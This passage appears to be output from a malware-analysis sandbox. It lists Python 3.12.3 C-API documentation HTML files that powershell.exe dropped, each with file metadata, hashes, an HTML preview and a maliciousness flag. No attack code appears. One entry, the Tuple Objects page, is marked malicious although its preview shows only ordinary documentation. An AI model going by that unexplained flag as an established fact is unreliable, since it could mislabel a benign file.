                                                                                                    SHA1:B889C5A288541C989F1C4826C5087BDB135763D2
                                                                                                    SHA-256:97CF60328DA673BF415E58E6992CF9A51887333EEB014017FCABC8FCEA6272ED
                                                                                                    SHA-512:7E1B864AFC10B4D9843ACBC43D3BB63DDC522407A65A1D2C0E769284CBC14617CE7CA9C7295CBE96DD9527AD8DFFD2C691CA671700CE0194C25A45F643D9ECF9
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Old Buffer Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/objbuffer.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions were part of the .old buffer protocol. API in Python 2. In Python 3, this protocol doesn.t exist anymore but the functions are still exposed to ease porting 2.x code. They act as a ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions were part of the .old buffer protocol
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1154), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97068
                                                                                                    Entropy (8bit):4.82427893690913
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:bqyjMTJZeHBeBqeYxeCJlUHgoE6VeCJleJDY4eCJleCHDLSLJQeCJleJD/JBeCJX:FENt/pMvg
                                                                                                    MD5:41E5F97493467FF20C47A63598EA5275
                                                                                                    SHA1:1E93BF9C4A86958FFF106C5A69B4B1F9718B89C5
                                                                                                    SHA-256:885BFF9F047F1C62A4ECBD748485149AF7C732A0D9C415AE3C7500783D719C87
                                                                                                    SHA-512:BBA88DB58A6B783018A8338DD37AEA8B4321BEA9A36D4743AC2713F9863FF5AF50C7AF3CC866089CDDC33700678A472556193E411D49A3C1D67F48339803BE19
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Object Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/object.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Object Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16752
                                                                                                    Entropy (8bit):4.87449704964025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:CcwlcHqkl8vmn1TMCunp5mVUqyn5TM3X76dqEC:rqy8OxMH7mVUntMH764N
                                                                                                    MD5:F320520FDA975A75D63F07C76CC1BEB5
                                                                                                    SHA1:3A988D6AC5F1042661E8789C7633B21313B8875F
                                                                                                    SHA-256:A7E9A61705984E694631DA4C100E17FDBFFA1CFF45309E3B4A9E5E192F404279
                                                                                                    SHA-512:8A5F8B56479768D4564530FDC60E2D0DEFEA6D6369827A58FC1F04E39EA28962E21431276B03190D27190531C4D588F0C98DDE9247D4DEE23547A60C2FC5CBE6
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Object Implementation Support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/objimpl.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter describes the functions, types, and macros used when defining new object types. Allocating Objects on the Heap, Common Object Structures- Base object types and macros, Implementing fun..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter describes the functions, types, and macr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1103), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20192
                                                                                                    Entropy (8bit):4.876514973239937
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3HqklSs1nqTMEmEqz6erQJFeiMH5OpoeCHIN0werDhbnITM/76dqEC:XqySoIMP6erQveiMH5OpoeCHIN0werDV
                                                                                                    MD5:892CDF2046EF215A1FAC2673C4FB0A30
                                                                                                    SHA1:0EC0487BE38A111753FE76B5120C129CFD25170A
                                                                                                    SHA-256:EFFD231F6EB7EF78C9F845A5777835351AFA1863A8371100A62391EA7F7265E1
                                                                                                    SHA-512:E3306C1A10724152CA5723FD300A44EC0B2B0F91B59222296B37D8332AAD8EA988DE29472BCE3876A9F64E649DC5446C4803843521DD23DB626E1057DEC13287
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Support for Perf Maps" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/perfmaps.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="On supported platforms (as of this writing, only Linux), the runtime can take advantage of perf map files to make Python functions visible to an external profiling tool (such as perf). A running pr..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="On supported platforms (as of this writing, only Linux), the
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (820), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):37929
                                                                                                    Entropy (8bit):4.941077785140546
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:6qyBt4MqbeCJl36YeCJlrlfAeCJlukt+NweCJlBJZeCJlMohZNJPeCJli0eCJlsV:6qy4MqbeCJl36YeCJlrlfAeCJlukt+N3
                                                                                                    MD5:8801BA977A599E84FC2686704210D098
                                                                                                    SHA1:95D582C907A192417AF6D3E6AC44A5B55A569EF7
                                                                                                    SHA-256:DC6FC615F63CC64E126FD2F503F6E6BCC2B31CF06DDF6CCD596FE913933D8E85
                                                                                                    SHA-512:3441189F423C53BF78C4C1F6C6FF85886C0FE0F28FD9DFE0092E06BA35BC453CDA5DF1010367DFA64ACA805DFB8BCA3E57332602399887E79C94DEC5EDB0C580
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Reference Counting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/refcounting.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions and macros in this section are used for managing reference counts of Python objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions and macros in this section are used for managing reference counts of Python objects." />..<meta property="og:image:width" content="200" />..<meta pr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (737), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19346
                                                                                                    Entropy (8bit):4.8923699527530315
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:HHqklMdknJTMNVJWermVJOerlVJceroJxerHCHreIVJMNCHNeIVJM4uYsn9TMw75:nqyMa9M/JWersJOernJceroJxerHCHr6
                                                                                                    MD5:F7EF7EF6A74A0D74ABCA752FE436B98B
                                                                                                    SHA1:23F6A8DDD4C889BD379FE08787BB8FE8EEB9A557
                                                                                                    SHA-256:D0CBB213F455E06CAB33EC2E2C8D219FE8ACFA95BC61C48A571DB37A3073FCAC
                                                                                                    SHA-512:7B7A8D429E5F81CB2B8BA6476FAFE19853B1FDA3655E1756ED6C201DE44F60C6B457CF3FABA0068F1C09234DA8371E44754149074FE66BDEED0EE0180A048FD9
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Reflection" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/reflection.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Reflection &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_stat
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1310), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):50587
                                                                                                    Entropy (8bit):4.837412214825317
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:0qyHMSUeCJl4ZeCJlEUeCJlpJNeCJSeJzAJGeCJlrmMJreCJSeJzSJYeCJlrmKJS:Mg
                                                                                                    MD5:56B339BDF0E0710A6F053DCAA7EE3379
                                                                                                    SHA1:C64E6C91A1E7E651ABB29057828D2A484CB29D3F
                                                                                                    SHA-256:001178FF662655D87AD524018C5CFF292F764AF06549720D01603CCB8306BB8A
                                                                                                    SHA-512:4A5CB6C98BEF458483A3B79A8BFE9ECAB885EEBD1FD2EA8A5993F282F3262A136734BE1F27637E966344FD49F966A550D6778A8BFEF249640502BFC2D9487824
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Sequence Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/sequence.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Sequence Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" hr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (871), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):46531
                                                                                                    Entropy (8bit):4.856628859617243
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:yqyvlMMt3eC9PBeTve3zeCJstFeCJsZTeCJs8YeCJse4eCJs7qeCJslJqeCJcSo9:yqyGMt3eC9PBeTve3zeCJstFeCJsZTe1
                                                                                                    MD5:FE67269735076CAE68EDBC4708AA18E1
                                                                                                    SHA1:CB90E3218E15928762159DD2F266BA2842ABF880
                                                                                                    SHA-256:F0252DF1FD4F4EE6D464D5DBC86443775BF53B009BA68059BF322D8F5423CEC9
                                                                                                    SHA-512:D05F3A1B89ABCF3C6D4054E1997D15CD14101300976BAD4FCF948E051A17C5A9ECBEDCBEBC646B793D70338931F5E618BA03E7DF341BA906637BA67DFF3EA7BC
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Set Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/set.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section details the public API for set and frozenset objects. Any functionality not listed below is best accessed using either the abstract object protocol (including PyObject_CallMethod(), Py..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section details the public API for set and frozenset objects. Any func
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1921), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34047
                                                                                                    Entropy (8bit):4.853956486974159
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:2qy2b0MFveyNeCJjcJEeCJUeJueJEnq4QeCJOrRrJUrJurJE9BeCJOrRrJUrJuri:2qylMFveyNeCJjcJEeCJUeJueJEnfQee
                                                                                                    MD5:2E0D0C93BDD2E75929C0608F86EA28B1
                                                                                                    SHA1:F92ADF9637D55271BD6D1C922CCBE3A32DB4F8BA
                                                                                                    SHA-256:14AF15EAFB663F5B5B410241127B2AB690013F4A170AAC66DE6AB7C16D54D581
                                                                                                    SHA-512:1D9A3BC98692C3E34853DEE1495CCD0F4CDC27A6DE151BD7555094238A96247668118A4CBC321A63AAFD845EBB1C1E5762A7F5F7E5442A03231E96CC614D02F4
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Slice Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/slice.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Ellipsis Object:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Ellipsis Object:" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Slice Objects &#8212; Python 3.12.3 documentation</title><meta name="vie
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):216651
                                                                                                    Entropy (8bit):4.945773715411537
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:yqy/AKMx2/eng1tQh+um6iSuW+igUFbLJWe/vSUiFQwxU8W5pILRaxf9tOOSLUkR:yqybMcengbQh9WeSax/pP7lMF764N
                                                                                                    MD5:FAAFD331831E731EF870F66FC20E3534
                                                                                                    SHA1:CC747DFC2E1E77BD9CC020153C4085AFEFE6EC22
                                                                                                    SHA-256:A1ACEA40C3400101897739250C069276C5887C68003D4E4B83D0CE5C5BF8D773
                                                                                                    SHA-512:6C3DCE897D7EAB4164106CD4D199E308EFF779A721F352A0957D00D82F8C030C2F4B57F551060464BFFB061C4E5A816BEC32DF9903B933E20C8DE9350758CF28
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="C API Stability" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/stable.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Unless documented otherwise, Python.s C API is covered by the Backwards Compatibility Policy, PEP 387. Most changes to it are source-compatible (typically by only adding new API). Changing existing..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Unless documented otherwise, Python.s C API is covered by the Ba
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1496), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):113548
                                                                                                    Entropy (8bit):4.929874763710125
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:Lqy4dM1sAxepPqeGe3peWFlefJkrJfLnefJkUFefJkv6efJkNJyefJlMMRMefJlm:WEskEy561l8RaRg
                                                                                                    MD5:9ABBDC5E3742403F862988733EAD2B3C
                                                                                                    SHA1:3C0EBF8E7AF992DE4DB58219726EA24058C60BB3
                                                                                                    SHA-256:1A63D770BB8AA39C9C2F88171C310DE718BC846011CAB7D87AFE10F6C4C6C6A2
                                                                                                    SHA-512:98FFF4848287986D5A1F844FB5966A88431DCFE7B376F470E3E9C51F0EB648FFA73D0B0CEDEB159243653A868C0EB53A3442D4E8B80ECD7D6EAFD3DF9F2FB861
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Common Object Structures" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/structures.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a large number of structures which are used in the definition of object types for Python. This section describes these structures and how they are used. Base object types and macros: All ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a large number of structures which are used i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (898), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79043
                                                                                                    Entropy (8bit):4.8711381767546555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:zqyxMXJseCJFJ8qjeYHgeCHvwQeBgekAem5e2nerMRMAeRGcRRAeUAoMeUAf91Hk:H7FiPoCQmSg
                                                                                                    MD5:F4CCB9ED00E2D61D27F2BDD4E434E515
                                                                                                    SHA1:4681BF68370555AD68AAC84487DA452CF36B3BA7
                                                                                                    SHA-256:A7E54EFC78C5B315B14FDE70C6EDA1E0719B4F774A17B56E4C84073279CBC10C
                                                                                                    SHA-512:BEFF0A532F1AED814EE20EDB3C7CFB1300E4D13521A08DEE7F3A5E35822225831514BE5F8FE84F5824F743CD020FAF54585026804F97254DDA74C11C7838B225
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Operating System Utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/sys.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="System Functions: These are utility functions that make functionality from the sys module accessible to C code. They all work with the current interpreter thread.s sys module.s dict, which is conta..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="System Functions: These are utility functions that make
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1180), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):52632
                                                                                                    Entropy (8bit):4.871431107434751
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:AqyBMiRerfe4qleCJseKeCJs/JAeP2gJNePnkaSeCJsnneCJsFJleCJsr3NJOeCq:v+g
                                                                                                    MD5:C684B2237C0B7ADA7F050ED1B7DA16F2
                                                                                                    SHA1:8295D38C76B771E690720E2D7FE5BB4146480FC8
                                                                                                    SHA-256:29D23A0F8D5D705337017D034E3F2B5073B1883E8748C9093453593E6FF17DDB
                                                                                                    SHA-512:3EA61BF79C678430A3E479702CCB7CC4FC1C2B21F246EAD21977DDB5B1249DA3852C6D7B147142784D47CC515075EF8F448D51DBE977A665715237C163DE12AF
                                                                                                    Malicious:true
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Tuple Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/tuple.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Struct Sequence Objects: Struct sequence objects are the C equivalent of namedtuple() objects, i.e. a sequence whose items can also be accessed through attributes. To create a struct sequence, you ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Struct Sequence Objects: Struct sequence objects are the C equivalent o
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1555), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87609
                                                                                                    Entropy (8bit):4.899854761834203
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:VqyGMc5eLDeFdeCJlBieCJlGp8e7EGe/JeyJ4e/JeLme/Jeh0eH6kWeU30qeU3eP:U2hu1rNxpNg
                                                                                                    MD5:03E6320EAD2EDFDB2D1D8D1C435F8249
                                                                                                    SHA1:3A06EF1520A569D0806F5D18308E8B887753DFD1
                                                                                                    SHA-256:63299C41D318DB31A58747D432AAA0BB3D4202A1DD1AE862C62B699B82725149
                                                                                                    SHA-512:D5B3F2142C051E89F986B60DC6A0A6683ED6DD78841D3B055AE468D585EC637904F34D531FAA83851E0127519DBB306B10D5AD2FCB165798DAD88D1D0261DB17
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Type Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/type.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Creating Heap-Allocated Types: The following functions and structs are used to create heap types." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Creating Heap-Allocated Types: The following functions and structs are used to create heap types." />..<meta property="og:image:width" content="200" />..<meta property="og:imag
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1012), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19681
                                                                                                    Entropy (8bit):4.888008295385176
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:hAHqklMeG76n2TM+/VJleIVJQEVJHtn/PsxPDYeujeT7enETM076dqEC:SqyJDcM+9JleCJQeJHtn/PspYeReKM01
                                                                                                    MD5:96DA513204CD642D3BF574532FFEEF2C
                                                                                                    SHA1:E5D882FC0A4537060A0AC8F0D4C5081765593F37
                                                                                                    SHA-256:6D657B7383A490E96DAC6F05EAF5F29244F26EBAEB4FECE75590111E1BFB58AB
                                                                                                    SHA-512:A045107ED428463F94A3142C8DA23DDCC639592625DB3863ACEAFC0306A42B6EA81C3CBF47500C91C6FC2DA5D2A252BA21A583FBA36BF881EEA4CC9306757453
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Objects for Type Hinting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/typehints.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Various built-in types for type hinting are provided. Currently, two types exist . GenericAlias and Union. Only GenericAlias is exposed to C." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Various built-in types for type hinting are provided. Currently, two types exist . GenericAlias and Union. Only
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):450266
                                                                                                    Entropy (8bit):4.8522974087846835
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:BxK+10bSMw8LXuvWDploSL+esSMwTwSM3ASMWe99tILbg:DYc8ruvWDplo1cTwjAp9tAg
                                                                                                    MD5:B98E16C9AED455FB6A0FBB3F815FC48D
                                                                                                    SHA1:D29B1E353F93225F32FFD7D948DF0F6958532D56
                                                                                                    SHA-256:D107CE6C88B068E3CE2BD45C94EA042AE714676E940464696114FE5430F22B3F
                                                                                                    SHA-512:52919BF8FD93554FF0DBD731B5E47F9DB5BF69B8B88A9F980024CD803D59D8FCB71D936651C1D558AC59D46A3505502B878B04BA5AEE18661AF50194B756F66D
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Type Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/typeobj.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Perhaps one of the most important structures of the Python object system is the structure that defines a new type: the PyTypeObject structure. Type objects can be handled using any of the PyObject_..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Perhaps one of the most important structures of the Python object syst
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1103), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):246175
                                                                                                    Entropy (8bit):4.845466352850264
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:XgpZVb+fuc32xsP4r9L7I5kJwYtYp5fCg:eg
                                                                                                    MD5:421072F86D15E1CAAA6AE18984F61D5D
                                                                                                    SHA1:625E1979886209883F9DA8F81C26B704A8B90A75
                                                                                                    SHA-256:5D0739EBD4E5FBC5E1150F7F464ADABF3275518477CEFA4E6CD52651C03141C2
                                                                                                    SHA-512:D2D075ECB275FCEA02F58E6D3D169B6749511B33038412561140E8F32A71FC4DD8A1344F765225591E5905FB4C7B3D48BCD03BE1D57F314AE6F19F46FDDDFA4F
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Unicode Objects and Codecs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/unicode.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Unicode Objects: Since the implementation of PEP 393 in Python 3.3, Unicode objects internally use a variety of representations, in order to allow handling the complete range of Unicode characters ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Unicode Objects: Since the implementation of PEP 393 in
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15210
                                                                                                    Entropy (8bit):4.832592879852463
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WErtZReKHqkX1vmKZMwMg0+nFgTMbj0k78MKZMO60anF2TMbgA76dqEC:XHqklccBnaTMXR/n4TMr76dqEC
                                                                                                    MD5:7B50A2F62CBD22DC5C37A9F5297D4C30
                                                                                                    SHA1:BA14C7B61EACB945CDD3BDA0C4C421E704D231A5
                                                                                                    SHA-256:3787A4F4BEB8F2EFC0C8F838F2C530A4C1FE822B52BDB47CBB117377B1BF4A0D
                                                                                                    SHA-512:CDC4023F2E9B6893A2A9C452E0C014450C3A94FD0213132A0208743E7818C16890D5E693239EC2BE9ED0568FADCA46889435AB87855BD2D84E00617FCCBA63EA
                                                                                                    Malicious:false
